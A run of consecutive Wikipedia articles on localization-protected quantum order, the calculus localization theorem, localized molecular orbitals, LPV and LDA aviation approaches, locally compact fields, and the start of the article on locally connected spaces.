Recent progress on the phenomenon of many-body localization has revealed classes of generic (typically disordered) many-body systems which never reach local thermal equilibrium, and thus lie outside the framework of equilibrium statistical mechanics. [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 1 ] MBL systems can undergo a dynamical phase transition to a thermalizing phase as parameters such as the disorder or interaction strength are tuned, and the nature of the MBL-to-thermal phase transition is an active area of research. The existence of MBL raises the interesting question of whether one can have different kinds of MBL phases, just as there are different kinds of thermalizing phases. Remarkably, the answer is affirmative, and out-of-equilibrium systems can also display a rich phase structure. What's more, the suppression of thermal fluctuations in localized systems can even allow for new kinds of order that are forbidden in equilibrium—which is the essence of localization-protected quantum order. [ 1 ] The recent discovery of time-crystals in periodically driven MBL systems is a notable example of this phenomenon. [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ]
Studying phase structure in localized systems requires us to first formulate a sharp notion of a phase away from thermal equilibrium. This is done via the notion of eigenstate order : [ 1 ] one can measure order parameters and correlation functions in individual energy eigenstates of a many-body system, instead of averaging over several eigenstates as in a Gibbs state. The key point is that individual eigenstates can show patterns of order that may be invisible to thermodynamic averages over eigenstates. Indeed, a thermodynamic ensemble average isn't even appropriate in MBL systems since they never reach thermal equilibrium. What's more, while individual eigenstates aren't themselves experimentally accessible, order in eigenstates nevertheless has measurable dynamical signatures. The eigenspectrum properties change in a singular fashion as the system transitions between from one type of MBL phase to another, or from an MBL phase to a thermal one---again with measurable dynamical signatures.
When considering eigenstate order in MBL systems, one generally speaks of highly excited eigenstates at energy densities that would correspond to high or infinite temperatures if the system were able to thermalize. In a thermalizing system, the temperature is defined via T = ( d S d E ) − 1 {\displaystyle T=\left({\frac {dS}{dE}}\right)^{-1}} where the entropy S {\displaystyle S} is maximized near the middle of the many-body spectrum (corresponding to T = ∞ {\displaystyle T=\infty } ) and vanishes near the edges of the spectrum (corresponding to T = 0 ± {\displaystyle T=0^{\pm }} ). Thus, "infinite temperature eigenstates" are those drawn from near the middle of the spectrum, and it more correct to refer to energy-densities rather than temperatures since temperature is only defined in equilibrium. In MBL systems, the suppression of thermal fluctuations means that the properties of highly excited eigenstates are similar, in many respects, to those of ground states of gapped local Hamiltonians. This enables various forms of ground state order to be promoted to finite energy densities.
We note that in thermalizing MB systems, the notion of eigenstate order is congruent with the usual definition of phases. This is because the eigenstate thermalization hypothesis (ETH) implies that local observables (such as order parameters) computed in individual eigenstates agree with those computed in the Gibbs state at a temperature appropriate to the energy density of the eigenstate. On the other hand, MBL systems do not obey the ETH and nearby many-body eigenstates have very different local properties. This is what enables individual MBL eigenstates to display order even if thermodynamic averages are forbidden from doing so.
Localization enables symmetry breaking orders at finite energy densities, forbidden in equilibrium by the Peierls-Mermin-Wagner Theorems.
Let us illustrate this with the concrete example of a disordered transverse field Ising chain in one dimension: [ 17 ] [ 1 ] [ 2 ]
where σ i x / y / z {\displaystyle \sigma _{i}^{x/y/z}} are Pauli spin-1/2 operators in a chain of length L {\displaystyle L} , all the couplings { J i , h i } {\displaystyle \{J_{i},h_{i}\}} are positive random numbers drawn from distributions with means J ¯ , h ¯ {\displaystyle {\overline {J}},{\overline {h}}} , and the system has Ising symmetry P = ∏ i σ i x {\displaystyle P=\prod _{i}\sigma _{i}^{x}} corresponding to flipping all spins in the z {\displaystyle z} basis. The J i n t {\displaystyle J_{\rm {int}}} term introduces interactions, and the system is mappable to a free fermion model (the Kitaev chain ) when J i n t = 0 {\displaystyle J_{\rm {int}}=0} .
Let us first consider the clean, non-interacting system: J i = J , h i = h , J i n t = 0 {\displaystyle J_{i}=J,\;h_{i}=h,\;J_{\rm {int}}=0} . In equilibrium, the ground state is ferromagnetically ordered with spins aligned along the z {\displaystyle z} axis for J > h {\displaystyle J>h} , but is a paramagnet for J < h {\displaystyle J<h} and at any finite temperature (Fig 1a). Deep in the ordered phase, the system has two degenerate Ising symmetric ground states which look like ``Schrödinger cat" or superposition states: | ψ 0 ± ⟩ = 1 2 ( | ↑ ↑ ⋯ ↑ ⟩ ± | ↓ ↓ ⋯ ↓ ⟩ ) {\displaystyle |\psi _{0}^{\pm }\rangle ={\frac {1}{\sqrt {2}}}(|\uparrow \uparrow \cdots \uparrow \rangle \pm |\downarrow \downarrow \cdots \downarrow \rangle )} . These display long-range order:
At any finite temperature, thermal fluctuations lead to a finite density of delocalized domain walls since the entropic gain from creating these domain walls wins over the energy cost in one dimension. These fluctuations destroy long-range order since the presence of fluctuating domain walls destroys the correlation between distant spins.
Upon turning on disorder, the excitations in the non-interacting model ( J i n t = 0 {\displaystyle J_{\rm {int}}=0} ) localize due to Anderson localization . In other words, the domain walls get pinned by the disorder, so that a generic highly excited eigenstate for J ¯ ≫ h ¯ {\displaystyle {\overline {J}}\gg {\overline {h}}} looks like | ψ S G n , ± ⟩ = 1 2 ( | ↑ ↑ ↓ ↓ ↓ ↑ ↑ ⋯ ⟩ ± | ↓ ↓ ↑ ↑ ↑ ↓ ↓ ⋯ ⟩ {\displaystyle |\psi _{\rm {SG}}^{n,\pm }\rangle ={\frac {1}{\sqrt {2}}}(|\uparrow \uparrow \downarrow \downarrow \downarrow \uparrow \uparrow \cdots \rangle \pm |\downarrow \downarrow \uparrow \uparrow \uparrow \downarrow \downarrow \cdots \rangle } , where n {\displaystyle n} refers to the n th {\displaystyle n^{\text{th}}} eigenstate and the pattern is eigenstate dependent. [ 1 ] [ 2 ] Note that a spin-spin correlation function evaluated in this state is non-zero for arbitrarily distant spins, but has fluctuating sign depending on whether an even/odd number of domain walls are crossed between two sites. Whence, we say that the system has long-range spin- glass (SG) order. Indeed, for J ¯ > h ¯ {\displaystyle {\overline {J}}>{\overline {h}}} , localization promotes the ground state ferromagnetic order to spin-glass order in highly excited states at all energy densities (Fig 1b). If one averages over eigenstates as in the thermal Gibbs state, the fluctuating signs causes the correlation to average out as required by Peierls theorem forbidding symmetry breaking of discrete symmetries at finite temperatures in 1D. For J ¯ < h ¯ {\displaystyle {\overline {J}}<{\overline {h}}} , the system is paramagnetic (PM), and the eigenstates deep in the PM look like product states in the x {\displaystyle x} basis and do not show long range Ising order: | ψ P M n ⟩ = | → → ← ← ← → ⋯ ⟩ {\displaystyle |\psi _{\rm {PM}}^{n}\rangle =|\rightarrow \rightarrow \leftarrow \leftarrow \leftarrow \rightarrow \cdots \rangle } . The transition between the localized PM and the localized SG at J ¯ = h ¯ {\displaystyle {\overline {J}}={\overline {h}}} belongs to the infinite randomness universality class. [ 17 ]
Upon turning on weak interactions J i n t ≠ 0 {\displaystyle J_{\rm {int}}\neq 0} , the Anderson insulator remains many-body localized and order persists deep in the PM/SG phases. Strong enough interactions destroy MBL and the system transitions to a thermalizing phase. The fate of the MBL PM to MBL SG transition in the presence of interactions is presently unsettled, and it is likely this transition proceeds via an intervening thermal phase (Fig 1c).
While the discussion above pertains to sharp diagnostics of LPQO obtained by evaluating order parameters and correlation functions in individual highly excited many-body eigenstates, such quantities are nearly impossible to measure experimentally. Nevertheless, even though individual eigenstates aren't themselves experimentally accessible, order in eigenstates has measurable dynamical signatures. In other words, measuring a local physically accessible observable in time starting from a physically preparable initial state still contains sharp signatures of eigenstate order.
For example, for the disordered Ising chain discussed above, one can prepare random symmetry-broken initial states which are product states in the z {\displaystyle z} basis: | ψ 0 ⟩ = | ↑ ↓ ↓ ↑ ⋯ ↑ ↑ ↓ ⟩ {\displaystyle |\psi _{0}\rangle =|\uparrow \downarrow \downarrow \uparrow \cdots \uparrow \uparrow \downarrow \rangle } . These randomly chosen states are at infinite temperature. Then, one can measures the local magnetization ⟨ σ i z ⟩ {\displaystyle \langle \sigma _{i}^{z}\rangle } in time, which acts as an order parameter for symmetry breaking. It is straightforward to show that ⟨ ψ 0 ( t ) | σ i z | ψ 0 ( t ) ⟩ {\displaystyle \langle \psi _{0}(t)|\sigma _{i}^{z}|\psi _{0}(t)\rangle } saturates to a non-zero value even for infinitely late times in the symmetry-broken spin-glass phase, while it decays to zero in the paramagnet. The singularity in the eigenspectrum properties at the transition between the localized SG and PM phases translates into a sharp dynamical phase transition which is measurable. Indeed, a nice example of this is furnished by recent experiments [ 15 ] [ 16 ] detecting time-crystals in Floquet MBL systems, where the time crystal phase spontaneously breaks both time translation symmetry and spatial Ising symmetry, showing correlated spatiotemporal eigenstate order.
Similar to the case of symmetry breaking order, thermal fluctuations at finite temperatures can reduce or destroy the quantum correlations necessary for topological order. Once again, localization can enable such orders in regimes forbidden by equilibrium. This happens for both the so-called long range entangled topological phases, and for symmetry protected or short-range entangled topological phases. The toric-code / Z 2 {\displaystyle Z_{2}} gauge theory in 2D is an example of the former, and the topological order in this phase can be diagnosed by Wilson loop operators. The topological order is destroyed in equilibrium at any finite temperature due to fluctuating vortices--- however, these can get localized by disorder, enabling glassy localization-protected topological order at finite energy densities. [ 12 ] On the other hand, symmetry protected topological (SPT) phases do have any bulk long-range order, and are distinguished from trivial paramagnets due to the presence of coherent gapless edge modes as long the protecting symmetry is present. In equilibrium, these edge modes are typically destroyed at finite temperatures as they decohere due to interactions with delocalized bulk excitations. Once again, localization protects the coherence of these modes even at finite energy densities! [ 18 ] [ 19 ] The presence of localization-protected topological order could potentially have far-reaching consequences for developing new quantum technologies by allowing for quantum coherent phenomena at high energies.
It has been shown that periodically driven or Floquet systems can also be many-body localized under suitable drive conditions. [ 20 ] [ 21 ] This is remarkable because one generically expects a driven many-body system to simply heat up to a trivial infinite temperature state (the maximum entropy state without energy conservation). However, with MBL, this heating can be evaded and one can again get non-trivial quantum orders in the eigenstates of the Floquet unitary, which is the time-evolution operator for one period. The most striking example of this is the time-crystal, a phase with long-range spatiotemporal order and spontaneous breaking of time translation symmetry. [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] This phase is disallowed in thermal equilibrium, but can be realized in a Floquet MBL setting. | https://en.wikipedia.org/wiki/Localization-protected_quantum_order |
In mathematics , particularly in integral calculus , the localization theorem allows, under certain conditions, to infer the nullity of a function given only information about its continuity and the value of its integral.
Let F ( x ) be a real-valued function defined on some open interval Ω of the real line that is continuous in Ω. Let D be an arbitrary subinterval contained in Ω. The theorem states the following implication: ∫ D F ( x ) d x = 0 ∀ D ⊂ Ω ⇒ F ( x ) = 0 ∀ x ∈ Ω {\displaystyle \int _{D}F(x)\,\mathrm {d} x=0~\forall D\subset \Omega ~\Rightarrow ~F(x)=0~\forall x\in \Omega }
A simple proof is as follows: if there were a point x 0 within Ω for which F ( x 0 ) ≠ 0 , then the continuity of F would require the existence of a neighborhood of x 0 in which the value of F was nonzero, and in particular of the same sign than in x 0 . Since such a neighborhood N , which can be taken to be arbitrarily small, must however be of a nonzero width on the real line, the integral of F over N would evaluate to a nonzero value. However, since x 0 is part of the open set Ω, all neighborhoods of x 0 smaller than the distance of x 0 to the frontier of Ω are included within it, and so the integral of F over them must evaluate to zero. Having reached the contradiction that ∫ N F ( x ) dx must be both zero and nonzero, the initial hypothesis must be wrong, and thus there is no x 0 in Ω for which F ( x 0 ) ≠ 0 .
The theorem is easily generalized to multivariate functions , replacing intervals with the more general concept of connected open sets , that is, domains , and the original function with some F ( x ) : R n → R , with the constraints of continuity and nullity of its integral over any subdomain D ⊂ Ω . The proof is completely analogous to the single variable case, and concludes with the impossibility of finding a point x 0 ∈ Ω such that F ( x 0 ) ≠ 0 .
An example of the use of this theorem in physics is the law of conservation of mass for fluids, which states that the mass of any fluid volume must not change: d d t ∫ V f ρ ( x → , t ) d Ω = 0 {\displaystyle {\frac {\mathrm {d} }{\mathrm {d} t}}\int _{V_{f}}\rho ({\vec {x}},t)\,\mathrm {d} \Omega =0}
Applying the Reynolds transport theorem , one can change the reference to an arbitrary (non-fluid) control volume V c . Further assuming that the density function is continuous (i.e. that our fluid is monophasic and thermodynamically metastable) and that V c is not moving relative to the chosen system of reference, the equation becomes: ∫ V c [ ∂ ρ ∂ t + ∇ ⋅ ( ρ v → ) ] d Ω = 0 {\displaystyle \int _{V_{c}}\left[{{\partial \rho } \over {\partial t}}+\nabla \cdot (\rho {\vec {v}})\right]\,\mathrm {d} \Omega =0}
As the equation holds for any such control volume, the localization theorem applies, rendering the common partial differential equation for the conservation of mass in monophase fluids: ∂ ρ ∂ t + ∇ ⋅ ( ρ v → ) = 0 {\displaystyle {\partial \rho \over \partial t}+\nabla \cdot (\rho {\vec {v}})=0} | https://en.wikipedia.org/wiki/Localization_theorem |
Localized molecular orbitals are molecular orbitals which are concentrated in a limited spatial region of a molecule, such as a specific bond or lone pair on a specific atom. They can be used to relate molecular orbital calculations to simple bonding theories, and also to speed up post-Hartree–Fock electronic structure calculations by taking advantage of the local nature of electron correlation . Localized orbitals in systems with periodic boundary conditions are known as Wannier functions .
Standard ab initio quantum chemistry methods lead to delocalized orbitals that, in general, extend over an entire molecule and have the symmetry of the molecule. Localized orbitals may then be found as linear combinations of the delocalized orbitals, given by an appropriate unitary transformation .
In the water molecule for example, ab initio calculations show bonding character primarily in two molecular orbitals, each with electron density equally distributed among the two O-H bonds. The localized orbital corresponding to one O-H bond is the sum of these two delocalized orbitals, and the localized orbital for the other O-H bond is their difference; as per Valence bond theory .
For multiple bonds and lone pairs, different localization procedures give different orbitals . The Boys and Edmiston-Ruedenberg localization methods mix these orbitals to give equivalent bent bonds in ethylene and rabbit ear lone pairs in water, while the Pipek-Mezey method preserves their respective σ and π symmetry .
For molecules with a closed electron shell, in which each molecular orbital is doubly occupied, the localized and delocalized orbital descriptions are in fact equivalent and represent the same physical state. It might seem, again using the example of water, that placing two electrons in the first bond and two other electrons in the second bond is not the same as having four electrons free to move over both bonds. However, in quantum mechanics all electrons are identical and cannot be distinguished as same or other . The total wavefunction must have a form which satisfies the Pauli exclusion principle such as a Slater determinant (or linear combination of Slater determinants), and it can be shown [ 1 ] that if two electrons are exchanged, such a function is unchanged by any unitary transformation of the doubly occupied orbitals.
For molecules with an open electron shell, in which some molecular orbitals are singly occupied, the electrons of alpha and beta spin must be localized separately. [ 2 ] [ 3 ] This applies to radical species such as nitric oxide and dioxygen. Again, in this case the localized and delocalized orbital descriptions are equivalent and represent the same physical state.
Localized molecular orbitals (LMO) [ 4 ] are obtained by unitary transformation upon a set of canonical molecular orbitals (CMO). The transformation usually involves the optimization (either minimization or maximization) of the expectation value of a specific operator. The generic form of the localization potential is:
⟨ L ^ ⟩ = ∑ i = 1 n ⟨ ϕ i ϕ i | L ^ | ϕ i ϕ i ⟩ {\displaystyle \langle {\hat {L}}\rangle =\sum _{i=1}^{n}\langle \phi _{i}\phi _{i}|{\hat {L}}|\phi _{i}\phi _{i}\rangle } ,
where L ^ {\displaystyle {\hat {L}}} is the localization operator and ϕ i {\displaystyle \phi _{i}} is a molecular spatial orbital. Many methodologies have been developed during the past decades, differing in the form of L ^ {\displaystyle {\hat {L}}} .
The optimization of the objective function is usually performed using pairwise Jacobi rotations. [ 5 ] However, this approach is prone to saddle point convergence (if it even converges), and thus other approaches have also been developed, from simple conjugate gradient methods with exact line searches, [ 6 ] to Newton-Raphson [ 7 ] and trust-region methods. [ 8 ]
The Foster-Boys (also known as Boys ) localization method [ 9 ] minimizes the spatial extent of the orbitals by minimizing ⟨ L ^ ⟩ {\displaystyle \langle {\hat {L}}\rangle } , where L ^ = | r → 1 − r → 2 | 2 {\displaystyle {\hat {L}}=|{\vec {r}}_{1}-{\vec {r}}_{2}|^{2}} . This turns out to be equivalent [ 10 ] [ 11 ] to the easier task of maximizing ∑ i n [ ⟨ ϕ i | r → | ϕ i ⟩ ] 2 {\displaystyle \sum _{i}^{n}[\langle \phi _{i}|{\vec {r}}|\phi _{i}\rangle ]^{2}} . In one dimension, the Foster-Boys (FB) objective function can also be written as
⟨ L ^ FB ⟩ = ∑ i ⟨ ϕ i | ( x ^ − ⟨ i | x ^ | i ⟩ ) 2 | ϕ i ⟩ {\displaystyle \langle {\hat {L}}_{\text{FB}}\rangle =\sum _{i}\langle \phi _{i}|({\hat {x}}-\langle i|{\hat {x}}|i\rangle )^{2}|\phi _{i}\rangle } . [ 12 ]
The fourth moment (FM) procedure [ 12 ] is analogous to Foster-Boys scheme, however the orbital fourth moment is used instead of the orbital second moment. The objective function to be minimized is
⟨ L ^ FM ⟩ = ∑ i ⟨ ϕ i | ( x ^ − ⟨ ϕ i | x ^ | ϕ i ⟩ ) 4 | ϕ i ⟩ {\displaystyle \langle {\hat {L}}_{\text{FM}}\rangle =\sum _{i}\langle \phi _{i}|({\hat {x}}-\langle \phi _{i}|{\hat {x}}|\phi _{i}\rangle )^{4}|\phi _{i}\rangle } .
The fourth moment method produces more localized virtual orbitals than Foster-Boys method, [ 12 ] since it implies a larger penalty on the delocalized tails. For graphene (a delocalized system), the fourth moment method produces more localized occupied orbitals than Foster-Boys and Pipek-Mezey schemes. [ 12 ]
Edmiston-Ruedenberg localization [ 5 ] maximizes the electronic self-repulsion energy by maximizing ⟨ L ^ ER ⟩ {\displaystyle \langle {\hat {L}}_{\text{ER}}\rangle } , where L ^ = | r → 1 − r → 2 | − 1 {\displaystyle {\hat {L}}=|{\vec {r}}_{1}-{\vec {r}}_{2}|^{-1}} .
Pipek-Mezey localization [ 13 ] takes a slightly different approach, maximizing the sum of orbital-dependent partial charges on the nuclei:
⟨ L ^ ⟩ PM = ∑ A atoms ∑ i orbitals | q i A | 2 {\displaystyle \langle {\hat {L}}\rangle _{\textrm {PM}}=\sum _{A}^{\textrm {atoms}}\sum _{i}^{\textrm {orbitals}}|q_{i}^{A}|^{2}} .
Pipek and Mezey originally used Mulliken charges , which are mathematically ill defined . Recently, Pipek-Mezey style schemes based on a variety of mathematically well-defined partial charge estimates have been discussed. [ 14 ] Some notable choices are Voronoi charges, [ 14 ] Becke charges, [ 14 ] Hirshfeld or Stockholder charges, [ 14 ] intrinsic atomic orbital charges (see intrinsic bond orbitals )", [ 15 ] Bader charges, [ 16 ] or "fuzzy atom" charges. [ 17 ] Rather surprisingly, despite the wide variation in the (total) partial charges reproduced by the different estimates, analysis of the resulting Pipek-Mezey orbitals has shown that the localized orbitals are rather insensitive to the partial charge estimation scheme used in the localization process. [ 14 ] However, due to the ill-defined mathematical nature of Mulliken charges (and Löwdin charges, which have also been used in some works [ 18 ] ), as better alternatives are nowadays available it is advisable to use them in favor of the original version.
The most important quality of the Pipek-Mezey scheme is that it preserves σ-π separation in planar systems, which sets it apart from the Foster-Boys and Edmiston-Ruedenberg schemes that mix σ and π bonds. This property holds independent of the partial charge estimate used. [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ]
While the usual formulation of the Pipek-Mezey method invokes an iterative procedure to localize the orbitals, a non-iterative method has also been recently suggested. [ 19 ]
Organic chemistry is often discussed in terms of localized molecular orbitals in a qualitative and informal sense. Historically, much of classical organic chemistry was built on the older valence bond / orbital hybridization models of bonding. To account for phenomena like aromaticity , this simple model of bonding is supplemented by semi-quantitative results from Hückel molecular orbital theory . However, the understanding of stereoelectronic effects requires the analysis of interactions between donor and acceptor orbitals between two molecules or different regions within the same molecule, and molecular orbitals must be considered. Because proper (symmetry-adapted) molecular orbitals are fully delocalized and do not admit a ready correspondence with the "bonds" of the molecule, as visualized by the practicing chemist, the most common approach is to instead consider the interaction between filled and unfilled localized molecular orbitals that correspond to σ bonds, π bonds, lone pairs, and their unoccupied counterparts. These orbitals and typically given the notation σ (sigma bonding), π (pi bonding), n (occupied nonbonding orbital, "lone pair"), p (unoccupied nonbonding orbital, "empty p orbital"; the symbol n * for unoccupied nonbonding orbital is seldom used), π* (pi antibonding), and σ* (sigma antibonding). (Woodward and Hoffmann use ω for nonbonding orbitals in general, occupied or unoccupied.) When comparing localized molecular orbitals derived from the same atomic orbitals, these classes generally follow the order σ < π < n < p ( n *) < π* < σ* when ranked by increasing energy. [ 20 ]
The localized molecular orbitals that organic chemists often depict can be thought of as qualitative renderings of orbitals generated by the computational methods described above. However, they do not map onto any single approach, nor are they used consistently. For instance, the lone pairs of water are usually treated as two equivalent sp x hybrid orbitals, while the corresponding "nonbonding" orbitals of carbenes are generally treated as a filled σ(out) orbital and an unfilled pure p orbital, even though the lone pairs of water could be described analogously by filled σ(out) and p orbitals ( for further discussion, see the article on lone pair and the discussion above on sigma-pi and equivalent-orbital models ). In other words, the type of localized orbital invoked depends on context and considerations of convenience and utility. | https://en.wikipedia.org/wiki/Localized_molecular_orbitals |
Localizer performance with vertical guidance ( LPV ) are the highest precision GPS ( SBAS enabled) aviation instrument approach procedures currently available without specialized aircrew training requirements, such as required navigation performance (RNP). Landing minima are usually similar to those of a Cat I instrument landing system (ILS), that is, a decision height of 200 feet (61 m) and visibility of 800 m. [ 1 ] Lateral guidance is equivalent to a localizer , and uses a ground-independent electronic glide path. Thus, the decision altitude , DA, can be as low as 200 feet. An LPV approach is an approach with vertical guidance, APV, to distinguish it from a precision approach, PA, or a non-precision approach, NPA. SBAS criteria includes a vertical alarm limit more than 12 m, but less than 50 m, yet an LPV does not meet the ICAO Annex 10 precision approach standard. [ 2 ]
Examples of receivers providing LPV capability include (from Garmin ) the GTN 7xx & 6xx, GNS 480, GNS 430W & 530W, and the post 2007 Garmin G1000 with GIA 63W. Various FMS models, GNSS receivers and FMS upgrades are available from Rockwell Collins (e.g. [ 3 ] ). Most new aircraft and helicopters equipped with integrated flight decks such as Rockwell Collins ProLine (TM) 21 and ProLine Fusion (TM) are LPV-capable. [ 4 ] In 2014, Avidyne began equipping general aviation and business aircraft with the IFD540 and IFD440 navigators incorporating a touch-screen flight management system with full LPV capability. [ 5 ]
LPV is designed to provide 25 feet (7.6 m) lateral and vertical accuracy 95 percent of the time. [ 6 ] Actual performance has exceeded these levels. WAAS has never been observed to have a vertical error greater than 12 metres in its operational history. [ citation needed ] As of September 17, 2015 the Federal Aviation Administration (FAA) has published 3,567 LPV approaches at 1,739 airports. As of October 7, 2021 the FAA has published 4,088 LPV approaches at 1,965 airports. This is greater than the number of published Category I ILS procedures. [ 7 ] | https://en.wikipedia.org/wiki/Localizer_performance_with_vertical_guidance |
A localizer type directional aid (LDA) or Instrument Guidance System (IGS) is a type of localizer -based instrument approach to an airport. It is used in places where, due to terrain and other factors, the localizer antenna array is not aligned with the runway it serves. In these cases, the localizer antenna array may be offset (i.e. pointed or aimed) in such a way that the approach course it projects no longer lies along the extended runway centerline (which is the norm for non-offset and non-LDA localizer systems). If the angle of offset is three degrees or less, the facility is classified as an offset localizer. If the offset angle is greater than three degrees, the facility is classified as a localizer-type directional aid (LDA). Straight-in approaches may be published if the offset angle does not exceed 30 degrees. Only circling minima are published for offset angles greater than 30 degrees. As a "directional aid", and only a Category I (CAT I) approach, rather than a full-fledged instrument landing system (ILS), the LDA is more commonly used to help the pilot safely reach a point near the runway environs, where he or she hopefully can see the runway, at which point he or she will proceed and land visually, as opposed to (for example) full Category III (CAT III) ILS systems that allow a pilot to fly, without visual references, very close to the runway surface (usually about 100 ft) depending on the exact equipment in the aircraft and on the ground.
An LDA uses exactly the same equipment to create the course as a standard localizer used in ILS . An LDA approach also is designed with a normal course width, which is typically 3 to 6 degrees. (At each "edge-of-course", commonly 1.5 or 3 degrees left and right of course, the transmitted signal is created in such a way as to ensure full-scale CDI needle deflection at and beyond these edges, so the pilot will never falsely believe they are intercepting the course outside of the actual course area. The area between these full-scale needle deflections is what defines the course width.) An LDA approach (considered a non-precision approach ) may have one or more marker beacons , perhaps a DME , and in rare instances a glide slope , just as other precision approaches have, such as ILS approaches.
If the offset is not greater than 30 degrees, straight-in approach minima may be published; circling minima only are published when offset exceeds 30 degrees. [ 1 ] [ 2 ]
The following 25 LDA approaches are available in the United States (as of November 2023): [ 3 ] [ 4 ] [ 5 ] | https://en.wikipedia.org/wiki/Localizer_type_directional_aid |
In algebra, a locally compact field is a topological field whose topology forms a locally compact Hausdorff space . [ 1 ] These kinds of fields were originally introduced in p-adic analysis since the fields Q p {\displaystyle \mathbb {Q} _{p}} of p-adic numbers are locally compact topological spaces constructed from the norm | ⋅ | p {\displaystyle |\cdot |_{p}} on Q {\displaystyle \mathbb {Q} } . The topology (and metric space structure) is essential because it allows one to construct analogues of algebraic number fields in the p-adic context.
One of the useful structure theorems for vector spaces over locally compact fields is that the finite dimensional vector spaces have only an equivalence class of norm: the sup norm . [ 2 ] pg. 58-59
Given a finite field extension K / F {\displaystyle K/F} over a locally compact field F {\displaystyle F} , there is at most one unique field norm | ⋅ | K {\displaystyle |\cdot |_{K}} on K {\displaystyle K} extending the field norm | ⋅ | F {\displaystyle |\cdot |_{F}} ; that is,
| f | K = | f | F {\displaystyle |f|_{K}=|f|_{F}}
for all f ∈ K {\displaystyle f\in K} which is in the image of F ↪ K {\displaystyle F\hookrightarrow K} . Note this follows from the previous theorem and the following trick: if ‖ ⋅ ‖ 1 , ‖ ⋅ ‖ 2 {\displaystyle \|\cdot \|_{1},\|\cdot \|_{2}} are two equivalent norms, and
‖ x ‖ 1 < ‖ x ‖ 2 {\displaystyle \|x\|_{1}<\|x\|_{2}}
then for a fixed constant c 1 {\displaystyle c_{1}} there exists an N 0 ∈ N {\displaystyle N_{0}\in \mathbb {N} } such that
( ‖ x ‖ 1 ‖ x ‖ 2 ) N < 1 c 1 {\displaystyle \left({\frac {\|x\|_{1}}{\|x\|_{2}}}\right)^{N}<{\frac {1}{c_{1}}}}
for all N ≥ N 0 {\displaystyle N\geq N_{0}} since the sequence generated from the powers of N {\displaystyle N} converge to 0 {\displaystyle 0} .
If the extension is of degree n = [ K : F ] {\displaystyle n=[K:F]} and K / F {\displaystyle K/F} is a Galois extension , (so all solutions to the minimal polynomial , or conjugate elements , of any a ∈ K {\displaystyle a\in K} are also contained in K {\displaystyle K} ) then the unique field norm | ⋅ | K {\displaystyle |\cdot |_{K}} can be constructed using the field norm [ 2 ] pg. 61 . This is defined as
| a | K = | N K / F ( a ) | 1 / n {\displaystyle |a|_{K}=|N_{K/F}(a)|^{1/n}}
Note the n-th root is required in order to have a well-defined field norm extending the one over F {\displaystyle F} since given any f ∈ K {\displaystyle f\in K} in the image of F ↪ K {\displaystyle F\hookrightarrow K} its norm is
N K / F ( f ) = det m f = f n {\displaystyle N_{K/F}(f)=\det m_{f}=f^{n}}
since it acts as scalar multiplication on the F {\displaystyle F} -vector space K {\displaystyle K} .
All finite fields are locally compact since they can be equipped with the discrete topology . In particular, any field with the discrete topology is locally compact since every point is the neighborhood of itself, and also the closure of the neighborhood, hence is compact.
The main examples of locally compact fields are the p-adic rationals Q p {\displaystyle \mathbb {Q} _{p}} and finite extensions K / Q p {\displaystyle K/\mathbb {Q} _{p}} . Each of these are examples of local fields . Note the algebraic closure Q ¯ p {\displaystyle {\overline {\mathbb {Q} }}_{p}} and its completion C p {\displaystyle \mathbb {C} _{p}} are not locally compact fields [ 2 ] pg. 72 with their standard topology.
Field extensions K / Q p {\displaystyle K/\mathbb {Q} _{p}} can be found by using Hensel's lemma . For example, f ( x ) = x 2 − 7 = x 2 − ( 2 + 1 ⋅ 5 ) {\displaystyle f(x)=x^{2}-7=x^{2}-(2+1\cdot 5)} has no solutions in Q 5 {\displaystyle \mathbb {Q} _{5}} since
d d x ( x 2 − 5 ) = 2 x {\displaystyle {\frac {d}{dx}}(x^{2}-5)=2x}
only equals zero mod p {\displaystyle p} if x ≡ 0 ( p ) {\displaystyle x\equiv 0{\text{ }}(p)} , but x 2 − 7 {\displaystyle x^{2}-7} has no solutions mod 5 {\displaystyle 5} . Hence Q 5 ( 7 ) / Q 5 {\displaystyle \mathbb {Q} _{5}({\sqrt {7}})/\mathbb {Q} _{5}} is a quadratic field extension. | https://en.wikipedia.org/wiki/Locally_compact_field |
In topology and other branches of mathematics , a topological space X is locally connected if every point admits a neighbourhood basis consisting of open connected sets.
As a stronger notion, the space X is locally path connected if every point admits a neighbourhood basis consisting of open path connected sets.
Throughout the history of topology, connectedness and compactness have been two of the most
widely studied topological properties. Indeed, the study of these properties even among subsets of Euclidean space , and the recognition of their independence from the particular form of the Euclidean metric , played a large role in clarifying the notion of a topological property and thus a topological space. However, whereas the structure of compact subsets of Euclidean space was understood quite early on via the Heine–Borel theorem , connected subsets of R n {\displaystyle \mathbb {R} ^{n}} (for n > 1) proved to be much more complicated. Indeed, while any compact Hausdorff space is locally compact , a connected space—and even a connected subset of the Euclidean plane—need not be locally connected (see below).
This led to a rich vein of research in the first half of the twentieth century, in which topologists studied the implications between increasingly subtle and complex variations on the notion of a locally connected space. As an example, the notion of connectedness im kleinen at a point and its relation to local connectedness will be considered later on in the article.
In the latter part of the twentieth century, research trends shifted to more intense study of spaces like manifolds , which are locally well understood (being locally homeomorphic to Euclidean space) but have complicated global behavior. By this it is meant that although the basic point-set topology of manifolds is relatively simple (as manifolds are essentially metrizable according to most definitions of the concept), their algebraic topology is far more complex. From this modern perspective, the stronger property of local path connectedness turns out to be more important: for instance, in order for a space to admit a universal cover it must be connected and locally path connected.
A space is locally connected if and only if for every open set U , the connected components of U (in the subspace topology ) are open. It follows, for instance, that a continuous function from a locally connected space to a totally disconnected space must be locally constant. In fact the openness of components is so natural that one must be sure to keep in mind that it is not true in general: for instance Cantor space is totally disconnected but not discrete .
Let X {\displaystyle X} be a topological space, and let x {\displaystyle x} be a point of X . {\displaystyle X.}
A space X {\displaystyle X} is called locally connected at x {\displaystyle x} [ 1 ] if every neighborhood of x {\displaystyle x} contains a connected open neighborhood of x {\displaystyle x} , that is, if the point x {\displaystyle x} has a neighborhood base consisting of connected open sets. A locally connected space [ 2 ] [ 1 ] is a space that is locally connected at each of its points.
Local connectedness does not imply connectedness (consider two disjoint open intervals in R {\displaystyle \mathbb {R} } for example); and connectedness does not imply local connectedness (see the topologist's sine curve ).
